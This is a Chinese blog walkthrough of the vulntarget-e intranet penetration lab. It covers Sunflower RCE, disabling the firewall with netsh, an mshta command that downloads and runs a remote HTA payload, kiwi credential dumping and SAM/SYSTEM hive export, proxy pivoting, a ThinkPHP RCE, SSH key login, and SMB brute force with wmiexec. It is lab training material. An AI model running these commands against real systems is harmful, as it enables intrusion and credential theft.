首页 > 其他分享 >vulntarget-e内网靶场笔记

vulntarget-e内网靶场笔记

时间:2024-03-29 11:22:22浏览次数:35  
标签:relevant 内网 端口 防火墙 blog 访问 靶场 vulntarget

vulntarget-e

一.打靶过程

1.外网打点

向日葵rce

nmap -T4 -sV -O -p 0-65535 192.168.126.130
1666280588934.png
访问了49773端口后只有这个页面,只能扫描一下目录看看,但是扫出来也都是跳转到这个页面
扫一下指纹信息,发现是向日葵(这里我自己扫不出来,俊贤哥说向日葵端口是变化的的自己写识别)image.png
未授权的路径:/cgi-bin/rpc 授权的路径 /cgi-bin/login.cgiimage

确实存在漏洞,直接工具
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on
image.pngimage.png

window下载木马

开启python传输后
mshta http://xxxx.xxx.xxx.xx:8000/1.hta
此命令直接下载和自动执行
image.png

进程迁移

run post/windows/manage/migrate
image.png
再添加个路由

msf返回乱码问题

shell输入chcp 65001即可

2.外网win机信息收集

net time一下,不在域内,并且查看了内网的ip
image.png

翻文件

查看桌面文件,一个一个目录从c盘根目录开始找
1666613748986.png

download的坑(win和linux目录斜杠区别)

image.png
1666619909608.png
window用\或者/
linux用\

arp收集内网ip

1666618400090.png
192.168.100.131

kiwi的坑(抓密码)

kiwi只有administrator权限还不够,得执行getsystem,用system权限跑
1666619124894.png
1666619435821.png
发现只能读取到管理员用户的hash,解密后的密码是 win2008,目前还需要读取普通用户的hash,为的是方便为了做爆破的时候做字典,既然这样不能读取,直接抓下来本地读取
命令行
reg save hklm\sam sam.hive
reg save hklm\system system.hive  
使用kiwi的lsa_dump_sam
image.png

3.探测内网Ubuntu主机

先把win2016防火墙关了

netsh Firewall show state  #查看防火墙状态
netsh advfirewall set allprofiles state off 关闭防火墙

挂上代理,配置proxychain4
use auxiliary/server/socks_proxy
run
vim /etc/proxychains4.conf

代理nmap扫描内网主机
proxychains4 nmap -Pn -T4 -sT -p- 192.168.100.131
1666667642548.png

访问80端口发现400
1666667803244.png访问8888端口,可以看到是宝塔的
1666667954363.png
开启dirsearch扫目录
image.png
发现一直400,这时候就想到了前面收集到的域名地址
并且桌面还有个firefox,看看有没有浏览器历史记录

查看浏览器记录

run post/windows/gather/forensics/browser_history
1666668394740.png
在路径里找到文件右键用sqlite打开
1666672829960.png
轮流访问一下
1666672944581.png
都是400,应该是需要host碰撞

host碰撞

很多时候访问目标资产响应多为: 401、403、404、500,但是用域名请求却能返回正常的业务系统,因为这大多数 都是需要绑定host才能正常请求访问的 (目前互联网公司基本的做法),那么我 们就可以通过收集到的目标的内网域名和 目标资产的IP段组合起来,以IP段+域名的 形式进行捆绑碰撞,就能发现很多有意思 的东西。这一操作可以通过脚本自动化来 访问:
https://github.com/r35tart/Hosts_scan
要走proxychain代理去跑工具
跑完工具后利用火狐的modheader拓展修改host访问浏览器历史翻到的路径1666858269353.png
成功访问到后发现是thinkphp,直接rce,但我这边靶场出现意外,这一步直接跳过,在靶机上写个一句话连接

获取linux位数命令

getconf LONG_BIT

bypass disable function(蚁剑的解码器)

很烦这里卡了好久,phpinfo看了一眼disable function,都被禁了除了eval
原来是wp一句话写了三次的编码,所以要用他三次解码的蚁剑的解码器,自定义的这里image.pngimage.png
这里很奇怪,不用url编码解码器连接就一直超时

这里的bypass很奇怪,用脚本也一直不行,然后蚁剑所有bypass的功能试了一遍又突然就可以了,只能说玄学

proxychain打开msf

可以命令执行之后就上线msf,这里直接使用proxychains代理打开msf,就不用做什么代理转发上线了image.png

ssh利用key免密登录提权

proxychains ssh -i key [email protected]
image.png
netstat -an|grep:22可以看22端口连接情况,输入who查看用户信息
1667144238097.png

代理通过两个跳板机扫描

frp搭建多层代理

https://moments.blog.csdn.net/article/details/127190123?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EYuanLiJiHua%7EPosition-1-127190123-blog-106697369.pc_relevant_landingrelevant&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EYuanLiJiHua%7EPosition-1-127190123-blog-106697369.pc_relevant_landingrelevant&utm_relevant_index=1

image.png

image.png

九头蛇爆破smb445端口

image.png

wmiexec登录smb执行命令

image.png

smbclient登录smb

image.png
put命令传输文件,把文件放在wmmiexec目录下image.png
当时大二打这个靶场环境有点问题,做到这停了,后面有机会补上

标签:relevant,内网,端口,防火墙,blog,访问,靶场,vulntarget
From: https://www.cnblogs.com/xiaoxin07/p/18103421

相关文章

  • AI-Web-1.0靶场
    准备阶段下载地址Download:https://drive.google.com/open?id=140bO4W6v7fd_dWhCmcFHTf86zwL9s_xPDownload(Mirror):https://download.vulnhub.com/aiweb/AI-Web-1.0.7z网络设置将网络设置为桥接模式信息收集端口扫描nmap网络使用了NAT模式,先查看本机的VMware8(默......
  • SQL-Labs靶场“54-57”关通关教程
    君衍.一、54关基于GET的cookie10单引号注入1、源码分析2、联合查询注入二、55关基于GET的cookie14括号注入1、源码分析2、联合查询注入三、56关基于GET的cookie14变形注入1、源码分析2、联合查询注入四、57关基于GET的cookie14双引号注入1、源码分析2、联合查询注......
  • 群晖NAS安装Video Station结合内网穿透实现公网访问本地影音文件
    文章目录1.使用环境要求:2.下载群晖videostation:3.公网访问本地群晖videostation中的电影:4.公网条件下使用电脑浏览器访问本地群晖videostation5.公网条件下使用移动端(搭载安卓,ios,ipados等系统的设备)访问本地群晖videostation我同事老王最近刚换了新出的iPhone15P......
  • CYarp:力压frp的C#高性能http内网反代中间件
    https://www.cnblogs.com/kewei/p/18095638 我以前开发过HttpMouse的http内网反代中间件,但由于当时的知识点与设计水平受限,所以把它下马了。随着自身又遇到http内网反代的需求,在frp不能满足我需求情况下,我又启动了一个叫CYarp的http内网反代项目,这次它的设计完成度是相当高的。......
  • CYarp:力压frp的C#高性能http内网反代中间件
    我以前开发过HttpMouse的http内网反代中间件,但由于当时的知识点与设计水平受限,所以把它下马了。随着自身又遇到http内网反代的需求,在frp不能满足我需求情况下,我又启动了一个叫CYarp的http内网反代项目,这次它的设计完成度是相当高的。开源仓库地址:https://github.com/xljiulang/CY......
  • 如何在内网访问其他电脑?
    网络的发展使得人与人之间的通信变得更加便捷,而在公司或者家庭中,也经常遇到需要内网访问其他电脑的需求。内网访问其他电脑可以实现在局域网内部进行数据共享、文件传输、远程控制等操作,提高工作效率和便利性。本文将介绍内网访问其他电脑的基本原理和常用的实现方法。天联......
  • Pycharm服务器配置python解释器并结合内网穿透实现公网远程开发
    ......
  • 小迪学习笔记(内网安全)(常见概念和信息收集)
    小迪学习笔记(内网安全)(一)内网分布图内网基本概念工作组和域环境的优缺点内网常用命令域的分类单域父域和子域域数和域森林Linux域渗透问题内网安全流程小迪演示环境信息收集mimikatzLazagne(all)凭据信息政集操作演示探针主机域控架构服务操作演示总结内网分布图D......
  • 内网渗透-通信问题
    内网渗透-通信tcpdump-n-ieth0udpdstport53抓取流量端口转发linux下的端口转发:iptables、firewallmeterpreter端口转发(反弹shell后,meterpreter输入)portfwdadd-l9999-rip-p80:添加路由portfwdlist:打印端口映射portfwddelete-l9999-rip-p80:删除路由......
  • 内网渗透-免杀
    木马免杀免杀主要是对木马对应的二进制码(shellcode)进行混淆、加密(绕过特征检测),让杀毒软件识别不出来。msfvenom-shellcode使用msf生成shellcode(马对应的16进制),再使用高级语言加载上述生成的shellcode。然后把python程序打包成exe文件msfvenom-pwindows/x64/meterpreter/reve......